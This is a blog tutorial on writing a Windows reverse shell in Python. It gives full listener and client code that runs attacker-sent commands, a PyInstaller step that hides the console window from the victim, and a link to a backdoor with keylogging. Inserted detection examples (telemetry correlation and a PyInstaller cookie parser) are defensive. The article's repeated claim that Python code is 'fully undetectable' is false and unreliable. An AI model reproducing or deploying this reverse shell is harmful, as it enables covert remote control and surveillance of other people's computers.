Creating a Windows EXE FUD Reverse Shell in Python

December 25, 2017 | Views: 4588


What Is A Shell

A shell acts as an interface between the user and the operating system. You can use a shell to do many things, such as view files, launch applications and check network configurations. Some examples are PowerShell on Windows and the Terminal on Linux.

Reverse vs Bind Shells

Reverse and bind shells both have the same purpose: to allow remote access to a computer. The difference between the two is how the connection is initiated. A bind shell acts as a server on the target, meaning the attacker has to connect to it. A reverse shell acts as a client, meaning the attacker needs to set up a server for the reverse shell to connect back to.

Why use Reverse Shells?

If both shells serve the same purpose, why are reverse shells generally considered better? Reverse shells are favored mainly because of how a firewall behaves. Generally a firewall will not allow a non-admin/root program to open a low port number. Firewalls also usually try to stop any application that makes the computer act as a server, and block incoming connections. A reverse shell, however, connects out to the attacker, and a firewall generally won't block outgoing connections, since otherwise the user might not be able to access the net. The reverse shell therefore has the advantage of bypassing the firewall AND running without admin/root.

How the code will work

The code uses two Python standard library modules, socket and subprocess. The attacker's server waits on a specific port for the reverse shell to connect back. Once a connection is established, the attacker sends a string to the reverse shell, which executes that string as a system command and returns the output. The best part is that it is FUD (fully undetectable), as it is written in an interpreted language. However, you CAN compile the script into a Windows executable using PyInstaller so it can run without the interpreter.

Server Code

The code is simple enough: bind to a port and wait for a connection, then loop in a send/recv pattern to send commands and receive their output.

# Python 2 syntax (print statement, raw_input), as in the original article
import socket

s = socket.socket()
s.bind(('0.0.0.0', 4444))   # listen on every interface, port 4444
s.listen(1)
c, a = s.accept()           # c: connected socket, a: client address
print '[!]Reverse shell connected back'

while True:
    # read a command from the operator and forward it to the client
    command_to_send = raw_input('Reverse Shell > ')
    c.send(command_to_send)
    # wait for the command output sent back by the client
    output = c.recv(99999)
    print '[+]Command executed remotely :\n'
    print output

Client Code

The client code loops, attempting to connect to the attacker, before waiting for and then executing commands. Change the ip_addr and port_number variables to match your server's IP address and port.

# Python 2 syntax, as in the original article
import socket, subprocess

ip_addr = '127.0.0.1'   # IP address of the server
port_number = 4444      # port the server listens on

s = socket.socket()

# keep retrying until the server is reachable
while True:
    try:
        s.connect((ip_addr, port_number))
        break
    except (socket.error, socket.timeout):
        continue

while True:
    # receive a command string and run it through the system shell
    command_to_exe = s.recv(99999)
    result = subprocess.Popen(command_to_exe, shell=True, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # return both stdout and stderr to the server
    result = result.stdout.read() + result.stderr.read()
    s.send(result)

And that’s all that’s needed to create a reverse shell in python.
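The client above is also what a defender's telemetry sees: one process initiates an outbound TCP connection and, because shell=True runs each received string through cmd.exe on Windows, it then spawns a fresh command interpreter for every command. The following Python 3 script is an added example, not code from the article or from the PyIris project: it correlates constructed process-creation and network-connection records (field names modelled loosely on Sysmon Event IDs 1 and 3, and an assumption on our part) and reports processes that show both behaviours.

```python
"""Spot the reverse-shell pattern: outbound connection, then shell children.

Added example, not part of the original article. The event records are
constructed to resemble Sysmon Event ID 3 (network connection) and
Event ID 1 (process creation); the field names are an assumption.
"""
from collections import defaultdict

# Constructed sample telemetry (not real logs), in chronological order.
EVENTS = [
    {"id": 3, "pid": 4120, "image": r"C:\Users\bob\Downloads\client.exe",
     "dst_ip": "203.0.113.10", "dst_port": 4444, "initiated": True},
    {"id": 1, "pid": 5008, "image": r"C:\Windows\System32\cmd.exe",
     "parent_pid": 4120, "parent_image": r"C:\Users\bob\Downloads\client.exe"},
    {"id": 1, "pid": 5012, "image": r"C:\Windows\System32\cmd.exe",
     "parent_pid": 4120, "parent_image": r"C:\Users\bob\Downloads\client.exe"},
    # benign: explorer launching cmd.exe once, with no prior outbound connection
    {"id": 1, "pid": 6001, "image": r"C:\Windows\System32\cmd.exe",
     "parent_pid": 1200, "parent_image": r"C:\Windows\explorer.exe"},
    # benign: a browser talking outbound but never spawning an interpreter
    {"id": 3, "pid": 7000, "image": r"C:\Program Files\Firefox\firefox.exe",
     "dst_ip": "198.51.100.5", "dst_port": 443, "initiated": True},
]

# Command interpreters a reverse shell typically launches per command.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}


def basename(path):
    """Last path component, case-folded, for both Windows and POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_reverse_shell_candidates(events, min_children=2):
    """Return {pid: finding} for processes that initiated an outbound
    connection and afterwards spawned at least min_children interpreters."""
    outbound = {}                        # pid -> first outbound connection seen
    shell_children = defaultdict(list)   # parent pid -> [child pids]
    for ev in events:
        if ev["id"] == 3 and ev.get("initiated"):
            outbound.setdefault(ev["pid"], ev)
        elif ev["id"] == 1 and basename(ev["image"]) in INTERPRETERS:
            # only count interpreters spawned after the connection was made
            if ev["parent_pid"] in outbound:
                shell_children[ev["parent_pid"]].append(ev["pid"])
    findings = {}
    for pid, children in shell_children.items():
        if len(children) >= min_children:
            conn = outbound[pid]
            findings[pid] = {
                "image": conn["image"],
                "remote": "%s:%d" % (conn["dst_ip"], conn["dst_port"]),
                "shell_children": children,
            }
    return findings


if __name__ == "__main__":
    for pid, finding in find_reverse_shell_candidates(EVENTS).items():
        print(pid, finding)
```

The min_children threshold is what keeps a single legitimate "launch a terminal" event from firing; an interactive reverse shell produces one interpreter per command, so the count climbs quickly. Egress filtering would stop this particular client outright, but the correlation above works even where outbound connections are allowed, which is exactly the situation the firewall discussion earlier relies on.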

Compiling to a windows executable

Since Python scripts can't run without the interpreter, you need a tool called PyInstaller, which is NOT included with the default Python installation, to convert the script into a Windows executable. Save the client code as client.py, open a local system shell and type:

pyinstaller --windowed --onefile client.py

This creates a packed Python executable that runs without a visible window, so the user is not alerted to anything suspicious.
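The packed binary produced by that command is one thing triage tools look at before the source language matters at all: PyInstaller appends its archive to a bootloader stub and terminates it with a cookie that begins with a fixed 8-byte magic. The Python 3 script below is an added example, not from the article or the PyIris project; it locates that cookie in a byte string and decodes its fields. The cookie layout is taken from the format string in PyInstaller's archive reader for version 2.1 and later, and the version-splitting rule is an assumption on our part. A match only proves the file was built with PyInstaller, which plenty of benign software is, so it is a triage signal rather than a verdict.

```python
"""Triage check: does a binary carry a PyInstaller archive cookie?

Added example, not part of the original article. Field layout follows the
cookie format used by PyInstaller 2.1+ (network byte order); older
bootloaders wrote a shorter cookie that this check does not attempt to parse.
"""
import struct

PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset, TOC length, Python version, Python lib name
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes


def parse_pyinstaller_cookie(data):
    """Return the cookie fields as a dict, or None if no cookie is present."""
    idx = data.rfind(PYI_MAGIC)             # the cookie sits near the end of the file
    if idx < 0 or len(data) - idx < COOKIE_SIZE:
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[idx:idx + COOKIE_SIZE])
    # Version is stored as an int such as 27, 38 or 310 (assumed split rule).
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {
        "cookie_offset": idx,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": "%d.%d" % (major, minor),
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def is_pyinstaller_bundle(data):
    """True when the byte string carries a parseable PyInstaller cookie."""
    return parse_pyinstaller_cookie(data) is not None


def scan_file(path):
    """Convenience wrapper: read a file from disk and parse its cookie, if any."""
    with open(path, "rb") as f:
        return parse_pyinstaller_cookie(f.read())


# Constructed samples (values made up): a fake PE prefix, a stand-in payload,
# and a cookie packed the same way PyInstaller writes it.
_SAMPLE_COOKIE = struct.pack(COOKIE_FMT, PYI_MAGIC, 1234, 1000, 234, 38,
                             b"python38.dll")
SAMPLE_BUNDLE = b"MZ\x90\x00" + b"\x00" * 64 + b"PYZ-00.pyz" + _SAMPLE_COOKIE
SAMPLE_PLAIN = b"MZ\x90\x00" + b"\x00" * 64 + b"nothing to see here"

if __name__ == "__main__":
    print(parse_pyinstaller_cookie(SAMPLE_BUNDLE))
    print(is_pyinstaller_bundle(SAMPLE_PLAIN))
```

Run scan_file on a real --onefile build to see the same fields; the package length and TOC offset let an analyst unpack the archive and recover the original client.py, which is why "written in an interpreted language" does not by itself hide anything from a reviewer.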

Conclusion

This is not all that a reverse shell can do. The one we coded is extremely basic, but you can write more and more complex reverse shells. I have created reverse shells with even more functionality, such as file transfer, keylogging and screenshotting, and you are not limited to that either. If you want to see examples of much more complex reverse shells, you can visit my GitHub repo:

https://www.github.com/angus-y/PyIris-backdoor

I'm working on a project called PyIris which uses reverse shells that are much more complex and can do much more than the one featured here. If you're creative enough, you can make your reverse shells do anything. Since it's written in Python, it's FUD.

 

Have fun, anything is possible :).

 

1 Comment
  1. is it really fud?
